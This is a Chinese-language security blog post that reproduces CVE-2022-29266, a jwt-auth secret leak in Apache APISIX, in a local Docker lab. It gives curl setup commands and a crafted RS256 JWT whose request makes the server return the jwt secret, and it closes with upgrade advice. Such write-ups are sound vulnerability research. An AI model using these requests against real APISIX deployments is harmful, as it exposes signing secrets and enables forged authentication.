CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

admin

138643
文章

114
评论

2022年8月26日10:36:47评论190 views字数 2104阅读7分0秒阅读模式

漏洞介绍

Apache Apisix是美国阿帕奇（Apache）基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现，具备动态路由和插件热加载，适合微服务体系下的 API 管理。

在2.13.1版本之前的Apache Apisix中，开启了 jwt-auth 插件的 APISIX 存在 jwt sceret泄露。

影响版本

Apache Apisix < 2.13.1

漏洞环境搭建

1、执行命令

git clone https://github.com/apache/apisix-docker

拉取apisix-docker

CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

2、进入apisix-docker/example目录，将docker-compose.yml文件中apisix image修改为apache/apisix:2.13.0-alpine

3、执行

docker-compose up -d

启动docker环境

4、访问http://localhost:9000，出现以下界面代表docker环境搭建成功

CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

5、执行命令

curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '{"username": "bugtest","plugins": {"jwt-auth": {"key": "bugtestkey","secret": "bugtestsecret"}}}'

配置consumer对象，并启动插件jwt-auth，其中插件jwt-auth的username、key、secret值可以为任意

6、再执行命令

curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '{"methods": ["GET"],"uri": "/index.html","plugins": {"jwt-auth": {}},"upstream": {"type": "roundrobin","nodes": {"localhost:8080": 1}}}'

配置路由，至此，漏洞环境已配置完成

漏洞复现

1、访问

https://jwt.io/#debugger-io

准备构造jwt进行漏洞测试

CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

2、将jwt算法修改为RS256

3、将payload修改为{"key": "bugtestkey"}，参数key值和之前生成的key值一致

4、点击SHARE JWT生成jwt:eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJidWd0ZXN0a2V5In0.QfvbXrqOCprKW3WGBh62r39Qxp1BYmI0jH9uamEC9PBP05Ycwyk8xAniKp6YeajrNEv8OBqKxHDdhFGdQ59DYaK7Xb2w4Zl1eqELV98ZGHKaV1U7Iqu8WoE9KurrEDZAY29N25-5AznsRRpiNPxVpReDuLgQ5qmDfzRbJHm2PkpmHPAYMUTKPlwyV6UC2dG6PWlXBuya5uC1qCPY45jRj85t9jmLW2y2aDAP59U-kRRDDFcDIzeAVE96KYFpbaQlM3tyisjtcQnmRGC2gC06N8Sk4smLhV0tn1lwRiQlRHxkUMcpJhgOb5XUocTZI7vYtiZPUv7AGh32yQYWrF1Ltg

5、执行命令

curl http://127.0.0.1:9080/index.html?jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJidWd0ZXN0a2V5In0.QfvbXrqOCprKW3WGBh62r39Qxp1BYmI0jH9uamEC9PBP05Ycwyk8xAniKp6YeajrNEv8OBqKxHDdhFGdQ59DYaK7Xb2w4Zl1eqELV98ZGHKaV1U7Iqu8WoE9KurrEDZAY29N25-5AznsRRpiNPxVpReDuLgQ5qmDfzRbJHm2PkpmHPAYMUTKPlwyV6UC2dG6PWlXBuya5uC1qCPY45jRj85t9jmLW2y2aDAP59U-kRRDDFcDIzeAVE96KYFpbaQlM3tyisjtcQnmRGC2gC06N8Sk4smLhV0tn1lwRiQlRHxkUMcpJhgOb5XUocTZI7vYtiZPUv7AGh32yQYWrF1Ltg

响应中出现jwt secret值：bugtestsecret，拥有jwt secret值后即可伪造jwt

漏洞修复

1、将Apache Apisix升级至Apache Apisix 2.13.1以上

CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

原文始发于微信公众号（第59号）：CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2022-29266 Apache Apisix jwt-auth插件密钥泄漏漏洞复现

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

Astral-PE 是用于本机 Windows PE 文件（x32/x64）的低级变异器（Headers/EP 混淆器）

【通俗易懂说AI】MCP如何安装以及使用

深入解析 URL 跳转漏洞：审计方法与渗透实战全攻略

记一次前端js加解密泄露引发的漏洞

发表评论

在线咨询

微信